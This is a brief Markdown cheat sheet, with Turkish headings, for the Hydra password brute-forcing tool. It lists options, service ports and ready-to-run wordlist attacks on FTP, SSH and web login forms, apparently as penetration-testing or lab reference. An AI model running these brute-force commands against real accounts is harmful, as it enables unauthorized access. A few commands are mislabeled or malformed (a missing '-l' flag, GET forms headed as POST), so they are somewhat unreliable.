---
title: hydra
date: 2022-11-10T09:00:00Z
draft: false
type: note
author: Kaptan
category: Cyber Security
subcategory: Commands
tags:
  - commands
  - tools
---

Temel kullanım:

```zsh
hydra -l [username] -P [wordlist_path] [IP] [service]
```

Option       | Explanation                               
-------------|-------------------------------------------
`-l [username]` | Provide the login name
`-P [wordlist_path]` | Specify the password list to use
`server [service]` | Set the IPaddress and service to attack
`-s [PORT]` | Use in case of non-default service port number
`-V or -vV` | Show the username and password combinations being tried
`-d` | Display debugging output if the verbose output is not helping

```zsh
hydra -l mark -P rockyou.txt 10.10.11.11 ftp
hydra -l mark -P rockyou.txt ftp://10.10.11.11
```

Farklı portu kullanmak(-s):

```zsh
hydra -l john -P rockyou.txt -s 80 ssh://10.10.11.11
```

Protocol     | TCP Port  | Application(s) | Data Security                             
-------------|-----------|----------------|---------------
FTP | 21 | File Transfer | Cleartext
FTPS | 990 | File Transfer | Encrypted
HTTP | 80 | Worldwide Web | Cleartext
HTTPS | 443 | Worldwide Web | Encrypted
IMAP | 143 | Email (MDA) | Cleartext
IMAPS | 993 | Email (MDA) | Encrypted
POP3 | 110 | Email (MDA) | Cleartext
POP3S | 995 | Email (MDA) | Encrypted
SFTP | 22 | File Transfer | Encrypted
SSH | 22 | Remote Access and File Transfer | Encrypted
SMTP | 25 | Email (MTA) | Cleartext
SMTPS | 465 | Email (MTA) | Encrypted
Telnet | 23 | Remote Access | Cleartext

### Örnek Kullanımlar

POST isteği ile kullanıcı adı ve parola denemesi:

```zsh
hydra -l [username] -P [wordlist_path] [IP] http-post-form \
    "/login/index.php:username=^USER^&password=^PASS^:Invalid Username Or Password"
```

POST form ile kullanıcı adı ve parola denemesi:

```zsh
hydra -l [username] -P [wordlist_path] [IP] http-get-form \ 
    "/login/index.php:username=^USER^&password=^PASS^:S=logout.php" -f 
```

POST form ile cookie vererek kullanıcı adı ve parola denemesi:

```zsh
hydra [username]-P [wordlist_path] [IP] http-get-form '/webadmin/login.php:username=^USER^&password=^PASS^&Login=Login:H=Cookie:PHPSESSID=3ttsh1nv5ruro6406nech49k76:Error!Username or password is incorrect.'
```

POST form ile belirli bir URL dizinini denemek:

```zsh
hydra -l [username] -P [wordlist_path] [IP] -V http-get /[PATH] -I
```

FTP kullanıcı adı ve parola denemesi:

```zsh
hydra -l [username] -P [wordlist_path] [IP] ftp
```

SSH kullanıcı adı ve parola denemesi:

```zsh
hydra -l [username] -P [wordlist_path] ssh://[IP]:[PORT]/[path_name] -t 4
```

Kullanıcı adı listesi ile parola denemesi:

```zsh
hydra -L [username_wordlist] -p 123 [URL] http-post-form \ 
    "/login:username=^USER^&password=^PASS^:Invalid username" -vv -I
```

Kullanıcı adı listesi ile ileri derecede parola denemesi:

```zsh
hydra -L [username_wordlist] -p idk -t 20 [URL] http-post-form \ 
    "/login:username=^USER^&password=^PASS^:Invalid username" -I
```
